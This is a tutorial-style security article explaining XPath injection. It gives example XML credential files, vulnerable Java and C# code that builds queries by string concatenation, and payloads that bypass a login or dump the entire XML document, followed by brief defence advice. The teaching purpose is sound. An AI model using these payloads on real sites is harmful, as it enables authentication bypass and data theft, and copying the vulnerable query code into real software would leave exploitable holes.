|
By Chris Gates, CISSP, CPTS, CEH
WTF is XPath Injection? Data can be stored in a XML file instead of an SQL Database. To sort through complex XML documents, developers created the XPath language.
http://www.w3.org/TR/xpath
XPath is a query language for XML documents, much like SQL is a query language for databases. Instead of tables, columns, and rows XML files have nodes in a tree. And like SQL, XPATH also had the potential for injection issues if queries are not properly sanitized.
Why is XPath Injection so dangerous?
- XPath 1.0 is a standard language. SQL has many dialects all based on a common, relatively weak syntax.
- XPath 1.0 allows one to query all items of the database (XML objects). In some SQL dialects, it is impossible to query for some objects of the database
using an SQL SELECT query (e.g. MySQL does not provide a table of tables).
- XPath 1.0 has no access control for the database , while in SQL, some parts of the database may be inaccessible due to lack of privileges to the application.
Example #1 from Hacking Exposed: Web 2.0
A SIMPLE example of an XML Database and Authentication using it:
<?xml version=”1.0” encoding=”ISO-8859-1”?> <users>
<user>
<id> 1 </id>
<username> admin </username>
<password> xp8th! </password>
</user>
<user>
<id> 2 </id>
<username> test </username>
<password> test987 </password>
</user>
<user>
<id> 3 </id>
<username> bigolnerd </username>
<password> nerdsneedlovetoo </password>
</user>
</users>
And some code to use it as an authentication database:
String username = req.getParameter(“username”); String password = req.getParameter(“password”);
XPathFactory factory = XPathFactory.newInstance();
Xpath xpath = factory.newXPath();
File file = new File(“/usr/webappdata/users.xml”);
InputSource src = new InputSource(new FileInputStream(file));
XPathExpression expr = xpath.compile(“//users[username/text()=’ “ + username + “ ‘ and password/text()=’ “ + password + ” ‘]/id/text()”);
String id = expr.evaluate(src);
This code loads the XML document and queries it for the ID associated with the provided username and password. Assuming the username is “admin” and the password was “xp8th!” the query would be:
//users[username/text()=’admin‘ and password/text()=’xp8th!‘] /id/text()
Nothing is escaped so you can place any data or XPath query into the query, like ‘ or ‘1’=’1;
//users[username/text()=’admin‘ and password/text()=’’ or ‘1’=’1‘ ]/id/text()
This would return the ID where the username is “admin” and the password is either null or 1=1 which is always true, you can return the ID for the admin without knowing the admin’s password.
Sample Command Line Xpath queries on users.xml document
an Xpath query to see all the root node would be:
cg@segfault:~$ xpath -e / users.xml Found 1 nodes in users.xml:
-- NODE --
<users>
<user>
<id> 1 </id>
<username> admin </username>
<password> xp8th! </password>
</user>
<user>
<id> 2 </id>
<username> test </username>
<password> test987 </password>
</user>
<user>
<id> 3 </id>
<username> bigolnerd </username>
<password> nerdsneedlovetoo </password>
</user>
</users>
an Xpath query to see the three user nodes would be
cg@segfault:~$ xpath -e /users/user users.xml Found 3 nodes in users.xml:
-- NODE --
<user>
<id> 1 </id>
<username> admin </username>
<password> xp8th! </password>
</user>
-- NODE --
<user>
<id> 2 </id>
<username> test </username>
<password> test987 </password>
</user>
-- NODE --
<user>
<id> 3 </id>
<username> bigolnerd </username>
<password> nerdsneedlovetoo </password>
</user>
an Xpath query to retrieve just the usernames would be:
/users/user/username/
cg@segfault:~$ xpath -e /users/user/username users.xml
Found 3 nodes in users.xml:
-- NODE --
<username> admin </username>
-- NODE --
<username> test </username>
-- NODE --
<username> bigolnerd </username>
Example #2 from (Resource #5)
The XML document:
<?xml version="1.0" encoding="utf-8" ?>
<orders>
<customer id="1">
<name>Bob Smith</name>
<email>
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
</email>
<creditcard>1234567812345678</creditcard>
<order>
<item>
<quantity>1</quantity>
<price>10.00</price>
<name>Sprocket</name>
</item>
<item>
<quantity>2</quantity>
<price>9.00</price>
<name>Cog</name>
</item>
</order>
</customer>
...
</orders>
The website allows its users to search for items in their order history based on price. The XPath query that the application performs looks like this:
string query = "/orders/customer[@id='" + customerId + "']/order/item[price >= '" + priceFilter + "']"; If both the customerId and priceFilter values have not been properly validated, an attacker will be able to exploit the XPath injection vulnerability. Entering the following value for either value will select the entire XML document and return it to the attacker:
'] | /* | /foo[bar='
Our query becomes:
string query = "/orders/customer[@id=''] | /* | /foo[bar='']/order/item[price >= '" + priceFilter + "']";
With one simple query the entire XML “database” has been returned.
Why the heck would someone use an XML file instead of a database??? Many XML applications build on raw XML dumps from databases and legacy applications. The idea is that you can dump EVRYTHING into an XML dump and then use an application or some code to parse thru it for the data you need. The problem is that there is no access control in XML, if your application or code reads the full XML document it’s possible that any data in the document could possibly be viewed (see Blind XPath Injection).
If your website uses an XML (Extensible Markup Language) document to store data and user input is included in an XPath query against that document, you may be vulnerable to an XPath injection.
How do you discover a site is using XPath? Or an XML database??
SecurityQAToolbar
Acunetix Web Scanner
Foundstone WSDigger
Wapti
Blind XPathBlind XPath Injection allows an attacker, given an XPath engine used to query an XML document, to retrieve all contents of the document without any specific knowledge of the XPath queries that the application uses. Blind XPath Injection can work even if the application's queries themselves are all limited to a document subset.
Defenses
The best way to defend against any kind of command/script injection is to sanitize user input. The best way to do this is to create a whitelist of allowable characters instead of creating a blacklist of unallowable characters. Whitelisting means allowing specific data for specific fields. For example, if input is credit card numbers then we only allow [0-9], for letters only letters [A-Z,a-z].
Resources1. http://www.ibm.com/developerworks/xml/library/x-think37/index.html
2. http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html?ca=dnw-828
3. http://www.packetstormsecurity.org/papers/bypass/Blind_XPath_Injection_20040518.pdf
4. WASC XPath Injection http://www.webappsec.org/projects/threat/classes/xpath_injection.shtml
5. http://www.site-reference.com/articles/Website-Development/Malicious-Code-Injection-It-s-Not-Just-for-SQL-Anymore.html
6. XPath Tutorial http://www.w3schools.com/xpath/
7. Getting started with XPath 2.0 http://www.ibm.com/developerworks/library/x-wxxm35.html
8. XPath Injection in XML Databases http://palisade.plynt.com/issues/2005Jul/xpath-injection/
9. http://www.site-reference.com/articles/Website-Development/Malicious-Code-Injection-It-s-Not-Just-for-SQL-Anymore.htm
Image of "Not XML Button" from Adam Kalsey's blog.
|